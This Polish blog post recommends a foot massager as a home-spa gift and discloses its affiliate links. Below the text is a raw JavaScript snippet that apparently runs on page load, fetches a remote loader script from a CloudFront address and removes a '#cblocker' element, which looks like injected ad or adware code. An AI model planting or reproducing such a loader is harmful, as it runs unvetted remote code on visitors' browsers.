Prezentuję sposób na domowe spa

12 marca 2012
wibracje innego rodzaju

Co prawda dopiero co skończył się cykl kobiecych prezentów, ale nic na to nie poradzę, że po przeżyciach z ubiegłego tygodnia, zaplanowałam na dziś wpis o kolejnym urządzeniu, które raczej ucieszy panie niż panów. Jeśli zastanawiacie się jakie to przeżycia miałam w zeszłym tygodniu to powiem tylko, że brak piątkowego wpisu na blogu i mojej obecności na Waszych blogach był najmniej namacalnym ich efektem. Najbardziej zaś odczuwalnym, i to boleśnie, były odciski na stopach od biegania w butach na obcasie od rana do nocy i to głównie po dworze.

Naprawdę podziwiam kobiety, które potrafią w szpilkach biegać na czas, albo chociaż chodzić codziennie bez masakrowania swoich stóp. Ja niestety nie urodziłam się do chodzenia na wysokich obcasach w związku z tym każdą okazję kiedy muszę spędzić dłuższy czas na podwyższeniu odchorowują moje stopy. Dlatego właśnie w weekend rozważałam poproszenie Pana M. o nabycie dla mnie pewnego sprzętu, który już od dawna uważam za świetny pomysł na prezent. I to właśnie urządzenie, wytwarzające innego rodzaju wibracje, chciałabym Wam dziś zaprezentować.


Masażer do stóp już od dawna jest moim marzeniem, bo przecież nie zawsze mamy czas na prawdziwy pedicure a czasem potrzeba dać zmęczonym stopom odpocząć i wymoczyć je trochę. A wiadomo, że przyjemniej jest je moczyć w wodzie z bąbelkami i elementami masująco-wibrującymi niż w zwykłej misce, prawda? Jest to naprawdę świetny sposób na domowe spa dla tych kobiet, które nie mają czasu albo środków na wyprawę do prawdziwego gabinetu kosmetycznego.

Masażer Beurer FB 20 – cena: 149 zł (www.agito.pl)

 

Taki masażer jest też bardzo dobrym prezentem dla zmarźluchów, bo dosyć często najbardziej marzną nam stopy, a urządzenie to ma funkcje utrzymywania temperatury wody! Na razie jeszcze nie poprosiłam Pana M. o to urządzenie wprost, ale kiedy pokazałam mu je przygotowując ten wpis, mam nadzieję, że zadziałał jeden z moich sposobów na podpowiadanie prezentów i kiedyś dostanę taki masażer.

P.S. Zdjęcie pochodzi ze strony www.agito.pl

Zawarte w tym wpisie linki do sklepu Agito to tak zwane linki afiliacyjne. Oznacza to, iż jeśli klikając na nie dokonacie zakupu otrzymam z tego tytułu prowizję. Nie zmieni to w żaden sposób ceny jaką Wy zapłacicie za zamówione produkty, a pokaże mi, że doceniacie moje rekomendacje. Będę Wam bardzo wdzięczna za korzystanie z tych linków.


if(typeof(jQuery)==’undefined’){(function(){var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.src=’https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState==”loaded”||ccm.readyState==”complete”){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();}
function ccm_e_init(jc){if(jc){jQuery.noConflict();}
jQuery(function(){var http=location.href.indexOf(‘https://’)>-1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d3lvr7yuk4uaui.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=15220&zoneid=14731&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};

Tagi:

Kategoria: , , ,

Blog jest po przeprowadzce,

więc jeśli zauważysz jakieś błędy, których nie wychwyciłam, napisz proszę do mnie :)

kontakt@prezentujeprezenty.pl

Poprzedni

Prezentuję kobiecą wersję erraty do trzeciej zasady mojej prywatnej teorii prezentowej

Następny

Prezentuję kolejny oryginalny element męskiej garderoby

Comments are closed here.